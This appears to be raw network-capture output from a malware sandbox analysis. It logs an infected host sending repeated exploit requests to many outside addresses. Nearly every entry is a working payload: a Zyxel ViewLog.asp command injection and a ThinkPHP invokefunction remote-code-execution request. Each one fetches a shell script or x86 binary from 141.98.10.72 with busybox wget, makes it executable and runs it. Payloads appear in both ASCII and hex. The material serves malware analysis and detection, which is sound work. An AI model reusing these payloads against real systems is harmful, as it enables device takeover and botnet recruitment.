                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4c722c31&#46;1707899412&#46;116b4084</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            976192.168.2.234218262.29.62.958080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.854873896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            977192.168.2.234461462.72.0.1498080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.855030060 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            978192.168.2.234630295.100.0.12080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.857419968 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:12.278099060 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:30:12 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:12 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 35 37 32 32 63 33 31 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 32 26 23 34 36 3b 32 30 30 38 34 36 30 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;55722c31&#46;1707899412&#46;20084606</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            979192.168.2.234880631.136.32.1678080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:12.012881041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:12.625914097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:13.872783899 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:16.368247032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:21.487683058 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:31.470165014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:52.203407049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            980192.168.2.235228831.136.40.1568080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:12.030268908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:12.720824957 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:14.064706087 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:16.880299091 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:22.255454063 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:33.005987883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:56.298852921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            981192.168.2.233429095.248.140.68080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:12.039429903 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            982192.168.2.235628062.29.30.1968080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:12.089171886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            983192.168.2.234149094.122.237.1098080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:12.089397907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            984192.168.2.235502231.200.127.2068080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:12.089430094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            985192.168.2.233989894.120.9.408080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:12.091202021 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            986192.168.2.235278494.137.3.858080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:12.104434967 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:12.368479967 CET274INHTTP/1.0 200 OK
                                                            Server: httpd/2.0
                                                            x-frame-options: SAMEORIGIN
                                                            x-xss-protection: 1; mode=block
                                                            Date: Wed, 14 Feb 2024 08:28:45 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            987192.168.2.2333260112.171.232.780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:12.568137884 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:12.851871967 CET495INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 08:30:12 GMT
                                                            Server: fwebserver
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            988192.168.2.235281494.137.3.858080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:12.625710964 CET334INHTTP/1.0 400 Bad Request
                                                            Server: httpd/2.0
                                                            x-frame-options: SAMEORIGIN
                                                            x-xss-protection: 1; mode=block
                                                            Date: Wed, 14 Feb 2024 08:28:45 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            989192.168.2.2351818112.12.91.12480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:12.699002981 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:13.116349936 CET477INHTTP/1.1 400 Bad Request
                                                            Server: kngx/1.10.2
                                                            Date: Wed, 14 Feb 2024 08:30:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 172
                                                            Connection: close
                                                            KS-Deny-Reason: client|81.181.57.74|cdnjhmp01-cache26.cdnjhmp01.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                            x-link-via: jhmp01:80;
